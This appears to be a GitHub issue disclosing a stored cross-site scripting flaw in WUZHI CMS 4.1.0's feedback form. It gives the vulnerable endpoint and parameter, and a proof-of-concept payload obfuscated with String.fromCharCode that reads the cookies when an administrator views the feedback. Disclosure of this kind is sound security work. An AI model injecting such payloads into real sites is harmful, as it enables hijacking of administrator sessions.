A xss vulnerability was discovered in WUZHI CMS 4.1.0
There is a persistent XSS attacks vulnerability which allows remote attackers to inject arbitrary web script or HTML via the form[content] parameter post to the /wuzhicms/www/index.php?m=feedback&f=index&v=contact
when administrator access - Extension module - Content feedback.then XSS vulnerability is triggered successfully
POC
hello,hello,<details/open/ontoggle=eval(String.fromCharCode(97)+String.fromCharCode(108)+String.fromCharCode(101)+String.fromCharCode(114)+String.fromCharCode(116)+String.fromCharCode(40)+String.fromCharCode(100)+String.fromCharCode(111)+String.fromCharCode(99)+String.fromCharCode(117)+String.fromCharCode(109)+String.fromCharCode(101)+String.fromCharCode(110)+String.fromCharCode(116)+String.fromCharCode(46)+String.fromCharCode(99)+String.fromCharCode(111)+String.fromCharCode(111)+String.fromCharCode(107)+String.fromCharCode(105)+String.fromCharCode(101)+String.fromCharCode(41))>hello,hellovulnerability trigger point
when administrator access - Extension module - Content feedback.then XSS vulnerability is triggeredThe text was updated successfully, but these errors were encountered: